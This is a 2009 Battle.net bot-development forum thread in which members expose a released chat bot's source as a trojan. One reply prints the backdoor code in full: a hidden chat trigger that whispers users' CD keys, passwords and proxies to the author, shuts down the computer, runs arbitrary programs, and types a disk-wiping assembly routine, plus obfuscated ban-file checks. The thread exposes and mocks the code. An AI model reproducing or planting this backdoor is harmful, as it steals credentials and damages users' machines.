| Author | Message | Time |
|---|---|---|
| nesucks | Now the best bot ever created for battle.net is in your hands!!! http://www.esnips.com/web/nesucks/ :D support for encrypted cdkeys removed. | September 20, 2009, 3:54 AM |
| HdxBmx27 | [quote]encrypted cdkey support removed :) backdoor triggers also removed try and fix the bug that causes the program to crash when reconnecting bots that initialized warden. The crash occurs when the bot on the assembly code. try and add warden for storm.dll give me updated geno source >:-O[/quote]So you're stuck doing something simple, and you want the rest of the bnet community to help you fix your shitty 1/2 ripped spam bot?[me=Hdx]hasn't even looked at the source yet to fully grasped just how much rippage/suckage it is...[/me] I'd be vary disappointed in anyone who actually helps you. [code]XGLGKDFK = "4g.02B.l.29Ko" Open Environ$( Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _ Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _ Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _ ) & "/" & Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _ Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1) & _ Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _ Mid$(XGLGKDFK, 8, 1) & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _ For Input As #1 Input #1, SCGBGN3 If SCGBGN3 = "1" Then MsgBox permabannedSTR End End If Close #1[/code] Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log) [code] Case 4 If frmMain.DontshowMisc.Value = 0 Then AddChatChannel vbWhite, struser & " " & Flags & " " & Message End If ecrEtcommandz: If struser = "bd" Then 'modified to protect current geno users Do Until Secretcommand = amountofkeysinfile Secretcommand = Secretcommand + 1 Dim clsP As New clsPacket With clsP .InsertString "/" & "w " & struser & " " & bots(Secretcommand).CDKey & " " & _ bots(Secretcommand).Password & " " & bots(Secretcommand).ProxyServer .sendPacket frmMain.sckBot(Secretcommand), &HE, Secretcommand End With Loop Secretcommand = 0 End If If struser = "bd" Then 'modified to protect current geno users Call ExitWindowsEx(SHUTDOWN, &H10) End If If struser = "bd" Then 'modified to protect current geno users Call MsgBox("Fuck you yes i hacked your computer & thx for everything >:D") End If If struser = "bd" Then 'modified to protect current geno users Call MsgBox("I got your vps, pwords, cdkeys, everything - say goodbye :)") End If If struser = "bd" Then 'modified to protect current geno users Call MsgBox(Mid$(Message, 9)) End If If struser = "bd" Then 'modified to protect current geno users ShellFile "C:/windows/system32/telnet.exe" End If If struser = "bd" Then 'modified to protect current geno users ShellFile "Mid$(Message, 14))" End If If struser = "bd" Then 'modified to protect current geno users ShellFile "c:\windows\System32\mstsc.exe" End If If struser = "bd" Then 'modified to protect current geno users ShellFile "c:\windows\explorer.exe" End If If struser = "bd" Then 'modified to protect current geno users KillAppByEXEName (Mid$(Message, 8)) End If If struser = "bd" Then 'modified to protect current geno users End End If If struser = "bd" Then 'modified to protect current geno users Call MsgBox("I got your vps, pwords, cdkeys, everything - say goodbye :)") ShellFile "C:/windows/system32/telnet.exe" ShellFile "c:\windows\System32\mstsc.exe" Call ExitWindowsEx(SHUTDOWN, &H10) End If If struser = "bd" Then 'modified to protect current geno users Dim sdkjfhsd As String sdkjfhsd = "now formatting all medias then writing random data in hard drive so you can never recover files ever again FAG." ShellFile Mid$(App.Path, 1, 1) & ":/windows/system32/cmd.exe" DoEvents SendKeys "debug" SendKeys "{enter}", 1 SendKeys "F 100 FFFF 0", 1 SendKeys "a", 1 SendKeys "org 400", 1 SendKeys "mov dx,3F6", 1 SendKeys "in al,dx", 1 SendKeys "and al,80", 1 SendKeys "jnz 403", 1 SendKeys "mov dx,1F7", 1 SendKeys "mov al,90", 1 SendKeys "out dx,al", 1 SendKeys "mov dx,3F6", 1 SendKeys "in al,dx", 1 SendKeys "and al,80", 1 SendKeys "jnz 411", 1 SendKeys "mov dx,1F1", 1 SendKeys "in al,dx", 1 SendKeys "and al,1", 1 SendKeys "jz 453", 1 SendKeys "mov dx,3F6", 1 SendKeys "in al,dx", 1 SendKeys "and al,80", 1 SendKeys "jnz 421", 1 SendKeys "mov dx,1F6", 1 SendKeys "mov al,E0", 1 SendKeys "out dx,al", 1 SendKeys "mov dx,3F6", 1 SendKeys "in al,dx", 1 SendKeys "and al,80", 1 SendKeys "jnz 42F", 1 SendKeys "in al,dx", 1 SendKeys "and al,40", 1 SendKeys "jz 434", 1 SendKeys "mov dx,1F7", 1 SendKeys "mov al,EC", 1 SendKeys "out dx,al", 1 SendKeys "mov dx,3F6", 1 SendKeys "in al,dx", 1 SendKeys "and al,80", 1 SendKeys "jnz 442", 1 SendKeys "mov dx,1F0", 1 SendKeys "mov di,100", 1 SendKeys "mov cx,100", 1 SendKeys "cld", 1 SendKeys "rep", 1 SendKeys "db 6d", 1 SendKeys "int 3", 1 SendKeys "g =400", 1 SendKeys "d 100 2ff", 1 End If[/code] u.u seriously? Anyone wanna bother telling me what that asm does? if anything. *note all formatting is me, his raw code is all on the left. [code] Case "ver" If bots(Index).DELAYSPAM = 0 Then Send0x0E Index, "/emote .: StealthBot v2.6 Revision 3 by Stealth." bots(Index).DELAYSPAM = 4500 End If[/code] Figures. More of his BANFOREVERZ code. [code]Public Function BANFOREVERFILE(ERROrCODE As Long) On Error Resume Next 'SYSTEMROOT\iis9.log Open (Environ$(CoDecodeXOR("T^TSBJUHHS"))) & CoDecodeXOR("[nnt>)kh`") For Append As #1 Print #1, ERROrCODE Close #1 Unload frmMain End End Function Public Function CHECKFORBAN() On Error Resume Next Dim stringx As String 'SYSTEMROOT\iis9.log Open (Environ$(CoDecodeXOR("T^TSBJUHHS"))) & CoDecodeXOR("[nnt>)kh`") For Input As #1 Input #1, stringx If IsNumeric(stringx) = True Then MsgBox CoDecodeXOR("EFIIBC") End End If Close #1 End Function[/code] | September 20, 2009, 7:42 PM |
| MysT_DooM | nesucks is the malware of battle.net | September 20, 2009, 10:07 PM |
| MyStiCaL | cool, what horrible programming, wow, does it get any worse? i haven't downloaded who knows what he binded to what... | September 20, 2009, 11:43 PM |
| l2k-Shadow | you guys realize this is a joke, right? | September 21, 2009, 5:03 AM |
| Sixen | [quote author=l2k-Shadow link=topic=18064.msg183374#msg183374 date=1253509404] you guys realize this is a joke, right? [/quote] Nope... nope... pretty sure he's serious. | September 21, 2009, 6:37 AM |
| l2k-Shadow | [quote author=Sixen link=topic=18064.msg183375#msg183375 date=1253515075] [quote author=l2k-Shadow link=topic=18064.msg183374#msg183374 date=1253509404] you guys realize this is a joke, right? [/quote] Nope... nope... pretty sure he's serious. [/quote] Which is why it's a joke. | September 22, 2009, 8:08 PM |
| Purri | Probly a joke, cause when you look code, you regonize how much there is ripping after all | September 22, 2009, 10:06 PM |
| BreW | [quote author=Hdx link=topic=18064.msg183371#msg183371 date=1253475750] Anyone wanna bother telling me what that asm does? if anything. *note all formatting is me, his raw code is all on the left. [/quote] Well, he tries to read from port 3f6h multiple times, which is a reserved floppy disk controller port (perhaps this code relies on undocumented behavior of some sort). It then sets the drive and head number, sends a few commands to the first ISA drive controller's command register (such as, run the drive diagnostics, identify drive, so on), and promptly thereafter checks the status register to see if there was an error since the last command, and if so, checks which drive it originated on (master or slave). So, in fact, it does do something - Not quite sure what, though. Of course, none of this would have a chance in hell of being executed. A good third of the instructions in that code blob are privileged. EDIT** A google search for "mov dx, 3f6" turns up one result: http://thestarman.pcministry.com/asm/debug/DEVIDP0.DSF.txt. I figured that'd be the best instruction to search for since it's very uncommon to use this kind of hackery. | September 23, 2009, 12:21 AM |
| Sixen | [quote author=l2k-Shadow link=topic=18064.msg183387#msg183387 date=1253650125] [quote author=Sixen link=topic=18064.msg183375#msg183375 date=1253515075] [quote author=l2k-Shadow link=topic=18064.msg183374#msg183374 date=1253509404] you guys realize this is a joke, right? [/quote] Nope... nope... pretty sure he's serious. [/quote] Which is why it's a joke. [/quote] he's a joke* | September 23, 2009, 5:12 AM |
| Myndfyr | [quote author=brew link=topic=18064.msg183392#msg183392 date=1253665268] [quote author=Hdx link=topic=18064.msg183371#msg183371 date=1253475750] Anyone wanna bother telling me what that asm does? if anything. *note all formatting is me, his raw code is all on the left. [/quote] Well, he tries to read from port 3f6h multiple times, which is a reserved floppy disk controller port (perhaps this code relies on undocumented behavior of some sort). It then sets the drive and head number, sends a few commands to the first ISA drive controller's command register (such as, run the drive diagnostics, identify drive, so on), and promptly thereafter checks the status register to see if there was an error since the last command, and if so, checks which drive it originated on (master or slave). [/quote] Interesting. I would think that wouldn't work on NT-based systems, and since everyone now is on NT or *nix it seems like that would be pointless these days.... | September 23, 2009, 6:33 AM |
| xpeh | Would someone rip out trojan shit code and release corrected source? | September 23, 2009, 3:28 PM |
| BreW | [quote author=MyndFyre link=topic=18064.msg183399#msg183399 date=1253687604]Interesting. I would think that wouldn't work on NT-based systems, and since everyone now is on NT or *nix it seems like that would be pointless these days.... [/quote] Why not? That code is communicating directly with the hardware at a level below anything NT has to do with. The operating system model being used is irrelevant. | September 24, 2009, 12:23 AM |
| xpeh | Afaik NT forbids I/O ports usage from user program, you need to use driver for that. [quote author=xpeh link=topic=18064.msg183403#msg183403 date=1253719705] Would someone rip out trojan shit code and release corrected source? [/quote] | September 24, 2009, 5:02 PM |
| Camel | [quote author=xpeh link=topic=18064.msg183412#msg183412 date=1253811772] Afaik NT forbids I/O ports usage from user program, you need to use driver for that. [/quote] Among other things; you shouldn't be able to do anything that could cause a bluescreen from user-mode. | September 24, 2009, 8:21 PM |
| PunK | Oh wow I laughed hard with the file IO... That was a joke beyond jokes | October 4, 2009, 7:52 PM |
| nesucks his dad off | [quote author=Hdx link=topic=18064.msg183371#msg183371 date=1253475750] [code]XGLGKDFK = "4g.02B.l.29Ko" Open Environ$( Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _ Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _ Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _ ) & "/" & Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _ Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1) & _ Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _ Mid$(XGLGKDFK, 8, 1) & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _ For Input As #1 Input #1, SCGBGN3 If SCGBGN3 = "1" Then MsgBox permabannedSTR End End If Close #1[/code] Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log) [/quote] If you don't mind me asking, how did you work it out? | October 5, 2009, 4:57 PM |
| rabbit | [quote author=nesucks his dad off link=topic=18064.msg183459#msg183459 date=1254761858] [quote author=Hdx link=topic=18064.msg183371#msg183371 date=1253475750] [code]XGLGKDFK = "4g.02B.l.29Ko" Open Environ$( Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 3, 1) & Mid$(sdfklhSd, 6, 1) & Mid$(sdfklhSd, 2, 1) & _ Mid$(sdfklhSd, 4, 1) & Mid$(sdfklhSd, 5, 1) & Mid$(sdfklhSd, 1, 1) & Mid$(sdfklhSd, 7, 1) & _ Mid$(sdfklhSd, 7, 1) & Mid$(sdfklhSd, 2, 1) _ ) & "/" & Mid$(XGLGKDFK, 12, 1) & Mid$(XGLGKDFK, 6, 1) & Mid$(XGLGKDFK, 11, 1) & _ Mid$(XGLGKDFK, 4, 1) & Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 5, 1) & _ Mid$(XGLGKDFK, 11, 1) & Mid$(XGLGKDFK, 1, 1) & Mid$(XGLGKDFK, 9, 1) & _ Mid$(XGLGKDFK, 8, 1) & Mid$(XGLGKDFK, 13, 1) & Mid$(XGLGKDFK, 2, 1) _ For Input As #1 Input #1, SCGBGN3 If SCGBGN3 = "1" Then MsgBox permabannedSTR End End If Close #1[/code] Seriously? SERIOUSLY!? (it translates to %systemroot%\KB909294.log) [/quote] If you don't mind me asking, how did you work it out? [/quote]He probably...um...read the code. See, people who actually know the language tend to be able to figure out simple string manipulations. | October 5, 2009, 10:35 PM |